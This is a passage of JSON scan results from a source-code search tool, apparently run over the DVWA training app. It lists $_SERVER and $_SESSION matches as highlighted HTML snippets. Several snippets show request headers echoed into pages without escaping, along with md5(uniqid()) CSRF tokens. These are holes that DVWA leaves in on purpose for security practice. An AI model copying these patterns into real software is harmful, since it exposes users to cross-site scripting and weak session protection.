class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> }\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Your user-agent address is: <em>{$_SERVER[ 'HTTP_USER_AGENT' ]}</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_REFERER'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 192,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/file3.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">7:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>File <span class=\"token number\">3</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\tWelcome back <span class=\"token operator\"><</span>em<span class=\"token operator\">></span><span class=\"token string\">\" . dvwaCurrentUser() . \"</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">10:</span> \t\tYour IP address is<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>em<span class=\"token operator\">></span>{<span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'REMOTE_ADDR'</span> <span class=\"token punctuation\">]</span>}<span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\"<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Forwarded for: <em>\"</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> }\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Your user-agent address is: <em>{$_SERVER[ 'HTTP_USER_AGENT' ]}</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_REFERER'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"You came from: <em>{$_SERVER[ 'HTTP_REFERER' ]}</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 193,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/file3.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">11:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Forwarded for: <em>\"</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'HTTP_X_FORWARDED_FOR'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> }\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"Your user-agent address is: <em>{$_SERVER[ 'HTTP_USER_AGENT' ]}</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'HTTP_REFERER'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SERVER</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">17:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"You came from: <em>{$_SERVER[ 'HTTP_REFERER' ]}</em><br />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> }\n<span class=\"line-number\">19:</span> \t\t<span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'body'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> \"I<span class=\"token string\">'m hosted at: <em>{$_SERVER[ '</span>HTTP_HOST' <span class=\"token punctuation\">]</span>}<span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">20:</span> \t\t<span class=\"token punctuation\">[</span><span class=\"token operator\"><</span>em<span class=\"token operator\">></span><span class=\"token operator\"><</span>a href<span class=\"token operator\">=</span>\\<span class=\"token string\">\"?page=include.php\\\"</span><span class=\"token operator\">></span>back<span class=\"token operator\"><</span><span class=\"token operator\">/</span>a<span class=\"token operator\">></span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span><span class=\"token punctuation\">]</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token operator\"><</span><span class=\"token operator\">/</span>div<span class=\"token operator\">></span>",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
},
{
"id": 216,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/high.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">19:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">rand</span><span class=\"token punctuation\">(</span> <span class=\"token number\">0</span><span class=\"token punctuation\">,</span> <span class=\"token number\">5</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token number\">3</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token function\">sleep</span><span class=\"token punctuation\">(</span> <span class=\"token function\">rand</span><span class=\"token punctuation\">(</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t}\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> User wasn<span class=\"token string\">'t found, so the page wasn'</span>t!\n<span class=\"highlight\"><span class=\"line-number\">24:</span> \t\t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_PROTOCOL'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">' 404 Not Found'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">27:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>User ID is MISSING from the database.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t}\n<span class=\"line-number\">29:</span> ",
"line": 24,
"start": 19,
"end": 30,
"severity": "unknown",
"note": ""
},
{
"id": 220,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">19:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>User ID exists in the database.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t}\n<span class=\"line-number\">22:</span> \t\t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">23:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> User wasn<span class=\"token string\">'t found, so the page wasn'</span>t!\n<span class=\"highlight\"><span class=\"line-number\">24:</span> \t\t\t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_PROTOCOL'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">' 404 Not Found'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">25:</span> \n<span class=\"line-number\">26:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>User ID is MISSING from the database.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">28:</span> \t\t}\n<span class=\"line-number\">29:</span> \t}",
"line": 24,
"start": 19,
"end": 30,
"severity": "unknown",
"note": ""
},
{
"id": 224,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/low.php",
"filetype": "php",
"search": "\\s\\$_SERVER",
"match": "<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">15:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>User ID exists in the database.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t}\n<span class=\"line-number\">17:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> User wasn<span class=\"token string\">'t found, so the page wasn'</span>t!\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t\t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'SERVER_PROTOCOL'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">' 404 Not Found'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">22:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'<pre>User ID is MISSING from the database.</pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}\n<span class=\"line-number\">24:</span> ",
"line": 19,
"start": 14,
"end": 25,
"severity": "unknown",
"note": ""
},
{
"id": 18,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">45:</span> \n<span class=\"line-number\">46:</span> \n<span class=\"line-number\">47:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Start session functions <span class=\"token operator\">-</span><span class=\"token operator\">-</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> function <span class=\"token operator\">&</span><span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">50:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">51:</span> \t\t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \t}\n<span class=\"line-number\">53:</span> \treturn <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">54:</span> }\n<span class=\"line-number\">55:</span> ",
"line": 50,
"start": 45,
"end": 56,
"severity": "unknown",
"note": ""
},
{
"id": 19,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">46:</span> \n<span class=\"line-number\">47:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Start session functions <span class=\"token operator\">-</span><span class=\"token operator\">-</span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> function <span class=\"token operator\">&</span><span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">50:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">51:</span> \t\t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">52:</span> \t}\n<span class=\"line-number\">53:</span> \treturn <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">54:</span> }\n<span class=\"line-number\">55:</span> \n<span class=\"line-number\">56:</span> ",
"line": 51,
"start": 46,
"end": 57,
"severity": "unknown",
"note": ""
},
{
"id": 20,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> function <span class=\"token operator\">&</span><span class=\"token function\">dvwaSessionGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">50:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">51:</span> \t\t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">52:</span> \t}\n<span class=\"highlight\"><span class=\"line-number\">53:</span> \treturn <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'dvwa'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">54:</span> }\n<span class=\"line-number\">55:</span> \n<span class=\"line-number\">56:</span> \n<span class=\"line-number\">57:</span> function <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pActions</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">58:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">in_array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pActions</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
"line": 53,
"start": 48,
"end": 59,
"severity": "unknown",
"note": ""
},
{
"id": 21,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">521:</span> \t\t<span class=\"token function\">dvwaRedirect</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$returnURL</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">522:</span> \t}\n<span class=\"line-number\">523:</span> }\n<span class=\"line-number\">524:</span> \n<span class=\"line-number\">525:</span> function <span class=\"token function\">generateSessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Generate a brand new <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"highlight\"><span class=\"line-number\">526:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">527:</span> \t\t<span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">528:</span> \t}\n<span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> ",
"line": 526,
"start": 521,
"end": 532,
"severity": "unknown",
"note": ""
},
{
"id": 22,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">524:</span> \n<span class=\"line-number\">525:</span> function <span class=\"token function\">generateSessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Generate a brand new <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"line-number\">526:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">527:</span> \t\t<span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">528:</span> \t}\n<span class=\"highlight\"><span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> \n<span class=\"line-number\">532:</span> function <span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Destroy any session <span class=\"token keyword\">with</span> the name <span class=\"token string\">'session_token'</span>\n<span class=\"line-number\">533:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">534:</span> }",
"line": 529,
"start": 524,
"end": 535,
"severity": "unknown",
"note": ""
},
{
"id": 23,
"file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPage.inc.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">528:</span> \t}\n<span class=\"line-number\">529:</span> \t<span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">530:</span> }\n<span class=\"line-number\">531:</span> \n<span class=\"line-number\">532:</span> function <span class=\"token function\">destroySessionToken</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Destroy any session <span class=\"token keyword\">with</span> the name <span class=\"token string\">'session_token'</span>\n<span class=\"highlight\"><span class=\"line-number\">533:</span> \t<span class=\"token function\">unset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">534:</span> }\n<span class=\"line-number\">535:</span> \n<span class=\"line-number\">536:</span> function <span class=\"token function\">tokenField</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> { # Return a field <span class=\"token keyword\">for</span> the <span class=\"token punctuation\">(</span>CSRF<span class=\"token punctuation\">)</span> token\n<span class=\"line-number\">537:</span> \treturn <span class=\"token string\">\"<input type='hidden' name='user_token' value='{$_SESSION[ 'session_token' ]}' />\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">538:</span> }",
"line": 533,
"start": 528,
"end": 539,
"severity": "unknown",
"note": ""
},
{
"id": 47,
"file": "/home/chris/src/DVWA-master/login.php",
"filetype": "php",
"search": "\\s\\$_SESSION",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token 